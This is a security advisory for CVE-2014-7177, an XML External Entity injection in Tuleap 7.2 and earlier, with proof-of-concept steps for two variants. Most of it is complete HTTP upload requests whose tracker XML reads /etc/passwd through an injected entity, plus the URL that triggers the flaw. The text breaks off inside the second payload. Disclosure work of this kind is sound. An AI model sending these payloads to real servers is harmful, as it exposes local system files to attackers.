Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz

Details:

A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability.

Vulnerability 1:

1) Upload a XXE using the following request:


POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25777276834778
Content-Length: 10561

-----------------------------25777276834778
Content-Disposition: form-data; name="group_id"

102
-----------------------------25777276834778
Content-Disposition: form-data; name="func"

docreate
-----------------------------25777276834778
Content-Disposition: form-data; name="group_id_template"

100
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_prjname"

Commencez à taper
-----------------------------25777276834778
Content-Disposition: form-data; name="create_mode"

xml
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="xee.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<tracker instantiate_for_new_projects="0">
  <name>123&xxe;</name>
  <item_name>e123&xxe;</item_name>
  <description>123&xxe;</description>
  <cannedResponses/>
  <formElements>
    <formElement type="file" ID="F1" rank="0" use_it="0">
      <name>attachment</name>
      <label>Attachments</label>
    </formElement>
    <formElement type="text" ID="F2" rank="2" use_it="0">
      <name>details</name>
      <label>Original Submission</label>
      <description>A full description of the artifact&xxe;</description>
      <properties rows="7" cols="60"/>
    </formElement>
    <formElement type="string" ID="F3" rank="4" use_it="0" required="1">
      <name>summary</name>
      <label>Summary</label>
      <description>One line description of the artifact&xxe;</description>
      <properties maxchars="150" size="60"/>
    </formElement>
    <formElement type="tbl" ID="F4" rank="6" use_it="0">
      <name>cc</name>
      <label>CC</label>
      <properties hint="Type in a search term"/>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
    <formElement type="sb" ID="F7" rank="12" use_it="0">
      <name>status_id</name>
      <label>Status</label>
      <description>Artifact Status</description>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F7-V0" label="Open">
            <description>The artifact has been submitted&xxe;</description>
          </item>
          <item ID="F7-V1" label="Closed">
            <description>The artifact is no longer active. See the Resolution field for details on how it was resolved.&xxe;</description>
          </item>
        </items>
      </bind>
    </formElement>
    <formElement type="sb" ID="F8" rank="14" use_it="0">
      <name>assigned_to</name>
      <label>Assigned to</label>
      <description>Who is in charge of solving the artifact&xxe;</description>
      <bind type="users">
        <items>
          <item label="group_members"/>
        </items>
      </bind>
    </formElement>
    <formElement type="sb" ID="F11" rank="20" use_it="0">
      <name>category_id</name>
      <label>Category</label>
      <description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
    <formElement type="sb" ID="F12" rank="22" use_it="0">
      <name>severity</name>
      <label>Priority</label>
      <description>How quickly the artifact must be completed</description>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F12-V0" label="1 - Lowest"/>
          <item ID="F12-V1" label="2"/>
          <item ID="F12-V2" label="3"/>
          <item ID="F12-V3" label="4"/>
          <item ID="F12-V4" label="5 - Medium"/>
          <item ID="F12-V5" label="6"/>
          <item ID="F12-V6" label="7"/>
          <item ID="F12-V7" label="8"/>
          <item ID="F12-V8" label="9 - Highest"/>
        </items>
        <decorators>
          <decorator REF="F12-V0" r="255" g="255" b="204"/>
          <decorator REF="F12-V1" r="255" g="255" b="102"/>
          <decorator REF="F12-V2" r="255" g="204" b="0"/>
          <decorator REF="F12-V3" r="255" g="153" b="0"/>
          <decorator REF="F12-V4" r="255" g="102" b="0"/>
          <decorator REF="F12-V5" r="255" g="51" b="0"/>
          <decorator REF="F12-V6" r="204" g="51" b="0"/>
          <decorator REF="F12-V7" r="153" g="0" b="0"/>
          <decorator REF="F12-V8" r="51" g="0" b="0"/>
        </decorators>
      </bind>
    </formElement>
    <formElement type="sb" ID="F13" rank="24" use_it="0">
      <name>stage&xxe;</name>
      <label>Stage&xxe;</label>
      <description>Stage in the life cycle of the artifact&xxe;</description>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F13-V0" label="New">
            <description>The artifact has just been submitted</description>
          </item>
          <item ID="F13-V1" label="Analyzed">
            <description>The cause of the artifact has been identified and documented</description>
          </item>
          <item ID="F13-V2" label="Accepted">
            <description>The artifact will be worked on.</description>
          </item>
          <item ID="F13-V3" label="Under Implementation">
            <description>The artifact is being worked on.</description>
          </item>
          <item ID="F13-V4" label="Ready for Review">
            <description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
          </item>
          <item ID="F13-V5" label="Ready for Test">
            <description>Updated/Created software is ready to be included in the next build</description>
          </item>
          <item ID="F13-V6" label="In Test">
            <description>Updated/Created software is in the build and is ready to enter the test phase</description>
          </item>
          <item ID="F13-V7" label="Approved">
            <description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
          </item>
          <item ID="F13-V8" label="Declined">
            <description>The artifact was not accepted.</description>
          </item>
          <item ID="F13-V9" label="Done">
            <description>The artifact is closed.</description>
          </item>
        </items>
      </bind>
    </formElement>
  </formElements>
  <semantics>
    <semantic type="tooltip"/>
  </semantics>
  <reports>
    <report is_default="0">
      <name>Default</name>
      <description>The system default artifact report</description>
      <criterias/>
      <renderers>
        <renderer type="table" rank="0" chunksz="15" multisort="15">
          <name>Results</name>
          <columns/>
        </renderer>
        <renderer type="plugin_graphontrackersv5" rank="1">
          <name>Default</name>
          <description>Graphic Report By Default For Support Requests</description>
          <charts/>
        </renderer>
      </renderers>
    </report>
  </reports>
  <workflow/>
  <permissions>
    <permission scope="field" REF="F1" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F1" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F1" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F4" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F4" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F4" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F7" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F7" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F7" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F12" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F12" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F12" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
  </permissions>
</tracker>

-----------------------------25777276834778
Content-Disposition: form-data; name="name"

123
-----------------------------25777276834778
Content-Disposition: form-data; name="description"

123
-----------------------------25777276834778
Content-Disposition: form-data; name="itemname"

e123
-----------------------------25777276834778
Content-Disposition: form-data; name="Create"

Créer
-----------------------------25777276834778--


2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:


https://[ip]/plugins/tracker/?group_id=102&tracker=11


3) Using retrieved tracker number, a XXE can be trigerred by visiting the following URL:


https://[ip]/plugins/tracker/?tracker=11&func=admin-formElements


Vulnerability 2

1) Upload a XXE using the following request:

<
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=e619b58add92383b3647ee5ba68c4a79
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------12077103611061
Content-Length: 25588

-----------------------------12077103611061
Content-Disposition: form-data; name="group_id"

102
-----------------------------12077103611061
Content-Disposition: form-data; name="func"

docreate
-----------------------------12077103611061
Content-Disposition: form-data; name="group_id_template"

100
-----------------------------12077103611061
Content-Disposition: form-data; name="tracker_new_prjname"

Commencez à taper
-----------------------------12077103611061
Content-Disposition: form-data; name="create_mode"

xml
-----------------------------12077103611061
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="tracker_bugs.xml"
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<tracker instantiate_for_new_projects="0">
  <name>Bugs</name>
  <item_name>bug</item_name>
  <description>Bugs Tracker</description>
  <cannedResponses/>
  <formElements>
    <formElement type="column" ID="F1" rank="120">
      <name>column8</name>
      <label>Column Top 1</label>
      <formElements>
        <formElement type="aid" ID="F2" rank="0">
          <name>artifact_id</name>
          <label>Artifact ID</label>
          <description>Unique artifact identifier&xxe;</description>
        </formElement>
        <formElement type="subby" ID="F3" rank="1">
          <name>submitted_by</name>
          <label>Submitted by</label>
          <description>User who originally submitted the artifact&xxe;</description>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="column" ID="F4" rank="121">
      <name>column10&xxe;</name>
      <label>Column Top 2&xxe;</label>
      <formElements>
        <formElement type="lud" ID="F5" rank="0">
          <name>last_update_date</name>
          <label>Last Modified On&xxe;</label>
          <description>Date and time of the latest modification in an artifact&xxe;</description>
        </formElement>
        <formElement type="subon" ID="F6" rank="2">
          <name>open_date&xxe;</name>
          <label>Submitted on&xxe;</label>
          <description>Date and time for the initial artifact submission&xxe;</description>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F7" rank="132" required="1">
      <name>fieldset_1</name>
      <label>Details</label>
      <description>fieldset_default_desc_key</description>
      <formElements>
        <formElement type="string" ID="F8" rank="0" required="1">
          <name>summary</name>
          <label>Summary</label>
          <description>One line description of the artifact</description>
          <properties maxchars="150" size="61"/>
        </formElement>
        <formElement type="text" ID="F9" rank="7">
          <name>details</name>
          <label>Original Submission</label>
          <description>A full description of the artifact</description>
          <properties rows="7" cols="80"/>
        </formElement>
        <formElement type="column" ID="F10" rank="8">
          <name>column10</name>
          <label>Column Details 1</label>
          <formElements>
            <formElement type="sb" ID="F11" rank="0">
              <name>severity</name>
              <label>Severity</label>
              <description>Impact of the artifact on the system (Critical, Major,...)</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F11-V0" label="1 - Ordinary"/>
                  <item ID="F11-V1" label="2"/>
                  <item ID="F11-V2" label="3"/>
                  <item ID="F11-V3" label="4"/>
                  <item ID="F11-V4" label="5 - Major"/>
                  <item ID="F11-V5" label="6"/>
                  <item ID="F11-V6" label="7"/>
                  <item ID="F11-V7" label="8"/>
                  <item ID="F11-V8" label="9 - Critical"/>
                </items>
                <decorators>
                  <decorator REF="F11-V0" r="255" g="255" b="102"/>
                  <decorator REF="F11-V1" r="255" g="204" b="51"/>
                  <decorator REF="F11-V2" r="255" g="153" b="0"/>
                  <decorator REF="F11-V3" r="255" g="102" b="0"/>
                  <decorator REF="F11-V4" r="255" g="51" b="0"/>
                  <decorator REF="F11-V5" r="204" g="0" b="0"/>
                  <decorator REF="F11-V6" r="153" g="0" b="0"/>
                  <decorator REF="F11-V7" r="102" g="0" b="0"/>
                  <decorator REF="F11-V8" r="51" g="0" b="0"/>
                </decorators>
              </bind>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="column" ID="F12" rank="12">
          <name>column10</name>
          <label>Column Details 2</label>
          <formElements>
            <formElement type="sb" ID="F13" rank="0">
              <name>category</name>
              <label>Category</label>
              <description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
              <bind type="static" is_rank_alpha="0"/>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="date" ID="F14" rank="20" use_it="0">
          <name>close_date</name>
          <label>End Date</label>
          <description>End Date</description>
          <properties default_value="today"/>
        </formElement>
        <formElement type="msb" ID="F15" rank="31" use_it="0">
          <name>multi_assigned_to</name>
          <label>Assigned to (multiple)</label>
          <description>Who is in charge of this artifact</description>
          <properties size="7"/>
          <bind type="users">
            <items>
              <item label="group_members"/>
            </items>
          </bind>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F17" rank="283">
      <name>fieldset1</name>
      <label>Stage</label>
      <formElements>
        <formElement type="column" ID="F18" rank="0">
          <name>column3</name>
          <label>Stage 1</label>
          <formElements>
            <formElement type="sb" ID="F19" rank="2">
              <name>status_id</name>
              <label>Status</label>
              <description>Artifact Status</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F19-V0" label="New"/>
                  <item ID="F19-V1" label="Unconfirmed"/>
                  <item ID="F19-V2" label="Verified"/>
                  <item ID="F19-V3" label="Resolved"/>
                  <item ID="F19-V4" label="Closed"/>
                  <item ID="F19-V5" label="Reopened"/>
                </items>
              </bind>
            </formElement>
            <formElement type="sb" ID="F20" rank="5" use_it="0">
              <name>stage</name>
              <label>Stage</label>
              <description>Stage in the life cycle of the artifact</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F20-V0" label="New">
                    <description>The artifact has just been submitted</description>
                  </item>
                  <item ID="F20-V1" label="Analyzed">
                    <description>The cause of the artifact has been identified and documented</description>
                  </item>
                  <item ID="F20-V2" label="Accepted">
                    <description>The artifact will be worked on.</description>
                  </item>
                  <item ID="F20-V3" label="Under Implementation">
                    <description>The artifact is being worked on.</description>
                  </item>
                  <item ID="F20-V4" label="Ready for Review">
                    <description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
                  </item>
                  <item ID="F20-V5" label="Ready for Test">
                    <description>Updated/Created software is ready to be included in the next build</description>
                  </item>
                  <item ID="F20-V6" label="In Test">
                    <description>Updated/Created software is in the build and is ready to enter the test phase</description>
                  </item>
                  <item ID="F20-V7" label="Approved">
                    <description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
                  </item>
                  <item ID="F20-V8" label="Declined">
                    <description>The artifact was not accepted.</description>
                  </item>
                  <item ID="F20-V9" label="Done">
                    <description>The artifact is closed.</description>
                  </item>
                </items>
              </bind>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="column" ID="F21" rank="2">
          <name>column4</name>
          <label>Stage 2</label>
          <formElements>
            <formElement type="sb" ID="F22" rank="0">
              <name>resolution</name>
              <label>Resolution</label>
              <description>The resolution field indicates what happened to the bug.</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F22-V0" label="Fixed"/>
                  <item ID="F22-V1" label="Will not fix"/>
                  <item ID="F22-V2" label="Invalid"/>
                  <item ID="F22-V3" label="Later"/>
                  <item ID="F22-V4" label="Duplicate"/>
                  <item ID="F22-V5" label="Remind"/>
                  <item ID="F22-V6" label="Works for me"/>
                </items>
              </bind>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="column" ID="F23" rank="3">
          <name>column9</name>
          <label>Stage 3</label>
          <formElements>
            <formElement type="sb" ID="F24" rank="0" notifications="1">
              <name>assigned_to</name>
              <label>Assigned to</label>
              <description>Who is in charge of solving the artifact</description>
              <bind type="users">
                <items>
                  <item label="group_members"/>
                </items>
              </bind>
            </formElement>
          </formElements>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F25" rank="284">
      <name>fieldset1</name>
      <label>Attachments</label>
      <formElements>
        <formElement type="file" ID="F26" rank="0">
          <name>attachment</name>
          <label>Attachments</label>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F27" rank="286">
      <name>fieldset1</name>
      <label>References</label>
      <formElements>
        <formElement type="cross" ID="F28" rank="0">
          <name>cross_references</name>
          <label>Cross references</label>
          <description>List of items referenced by or referencing this item.</description>
        </formElement>
        <formElement type="art_link" ID="F29" rank="1" use_it="0">
          <name>references</name>
          <label>References</label>
          <properties size="30"/>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F30" rank="287">
      <name>fieldset1</name>
      <label>Permissions</label>
      <formElements>
        <formElement type="perm" ID="F31" rank="0">
          <name>permissions_on_artifact</name>
          <label>Permissions on artifact</label>
          <description>Let users groups to define who can access an artifact.</description>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="sb" ID="F32" rank="26" use_it="0">
      <name>platform</name>
      <label>Platform</label>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F32-V0" label="Linux"/>
          <item ID="F32-V1" label="Windows XP"/>
          <item ID="F32-V2" label="Solaris"/>
          <item ID="F32-V3" label="Windows 2000"/>
          <item ID="F32-V4" label="Other"/>
        </items>
      </bind>
    </formElement>
    <formElement type="sb" ID="F33" rank="28" use_it="0">
      <name>source</name>
      <label>Source</label>
      <description>Customer from which the request comes from.</description>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
    <formElement type="sb" ID="F34" rank="30" use_it="0">
      <name>version</name>
      <label>Version</label>
      <description>Product version concerned by the bug.</description>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
  </formElements>
  <semantics>
    <semantic type="title">
      <shortname>title</shortname>
      <label>Titre</label>
      <description>Définir le titre d'un artéfact</description>
      <field REF="F8"/>
    </semantic>
    <semantic type="status">
      <shortname>status</shortname>
      <label>Ã?tat</label>
      <description>Définir l'état d'un artifact</description>
      <field REF="F19"/>
      <open_values>
        <open_value REF="F19-V0"/>
        <open_value REF="F19-V1"/>
        <open_value REF="F19-V2"/>
        <open_value REF="F19-V3"/>
        <open_value REF="F19-V5"/>
      </open_values>
    </semantic>
    <semantic type="contributor">
      <shortname>contributor</shortname>
      <label>Contributor/assignee</label>
      <description>Define the contributor/assignee of an artifact</description>
      <field REF="F24"/>
    </semantic>
    <semantic type="tooltip">
      <field REF="F2"/>
      <field REF="F8"/>
      <field REF="F19"/>
    </semantic>
  </semantics>
  <reports>
    <report is_default="0">
      <name>Bugs</name>
      <description>The system default artifact report</description>
      <criterias>
        <criteria rank="0">
          <field REF="F19"/>
        </criteria>
        <criteria rank="1">
          <field REF="F24"/>
        </criteria>
        <criteria rank="2">
          <field REF="F6"/>
        </criteria>
        <criteria rank="3">
          <field REF="F2"/>
        </criteria>
        <criteria rank="4">
          <field REF="F5"/>
        </criteria>
        <criteria rank="5">
          <field REF="F8"/>
        </criteria>
        <criteria rank="6">
          <field REF="F9"/>
        </criteria>
        <criteria rank="7">
          <field REF="F22"/>
        </criteria>
        <criteria rank="8">
          <field REF="F13"/>
        </criteria>
      </criterias>
      <renderers>
        <renderer type="table" rank="0" chunksz="15" multisort="15">
          <name>Results</name>
          <columns>
            <field REF="F2"/>
            <field REF="F8"/>
            <field REF="F6"/>
            <field REF="F24"/>
            <field REF="F3"/>
          </columns>
        </renderer>
        <renderer type="plugin_graphontrackersv5" rank="1">
            <name>Charts</name>
            <description>Graphic Report</description>
            <charts>
                <chart type="pie" width="600" height="400" rank="0" base="F19">
                    <title>Status</title>
                    <description>Number of Artifacts by Status</description>
                </chart>
                <chart type="bar" width="600" height="400" rank="1" base="F11">
                    <title>Severity</title>
                    <description>Number of Artifacts by severity level</description>
                </chart>
                <chart type="pie" width="600" height="400" rank="2" base="F24">
                    <title>Assignment</title>
                    <description>Number of Artifacts by Assignee</description>
                </chart>
            </charts>
        </renderer>
      </renderers>
    </report>
    <report is_default="0">
      <name>Default</name>
      <description>The system default artifact report</description>
      <criterias>
        <criteria rank="0">
          <field REF="F19"/>
        </criteria>
        <criteria rank="1">
          <field REF="F24"/>
        </criteria>
        <criteria rank="2">
          <field REF="F6"/>
        </criteria>
        <criteria rank="3">
          <field REF="F2"/>
        </criteria>
        <criteria rank="4">
          <field REF="F13"/>
        </criteria>
      </criterias>
      <renderers>
        <renderer type="table" rank="0" chunksz="15" multisort="15">
          <name>Results</name>
          <columns>
            <field REF="F2"/>
            <field REF="F8"/>
            <field REF="F6"/>
            <field REF="F24"/>
            <field REF="F3"/>
          </columns>
        </renderer>
      </renderers>
    </report>
  </reports>
  <workflow>
    <field_id REF="F19"/>
    <is_used>1</is_used>
    <transitions>
        <transition>
            <from_id REF="null"/>
            <to_id REF="F19-V0"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V1"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V2"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V1"/>
            <to_id REF="F19-V2"/>
        </transition>
        <transition>
            <from_id REF="F19-V1"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V3"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V4"/>
            <to_id REF="F19-V5"/>
        </transition>
        <transition>
            <from_id REF="F19-V5"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V5"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V1"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V2"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V2"/>
            <to_id REF="F19-V4"/>
        </transition>
    </transitions>
  </workflow>
  <permissions>
    <permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F5" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F6" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F9" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F9" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F9" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F14" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F14" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F14" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F15" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F15" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F15" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F19" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F19" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F19" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F20" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F20" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F20" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F22" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F22" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F22" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F24" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F24" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F24" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F26" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F26" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F26" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F28" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F29" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F29" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
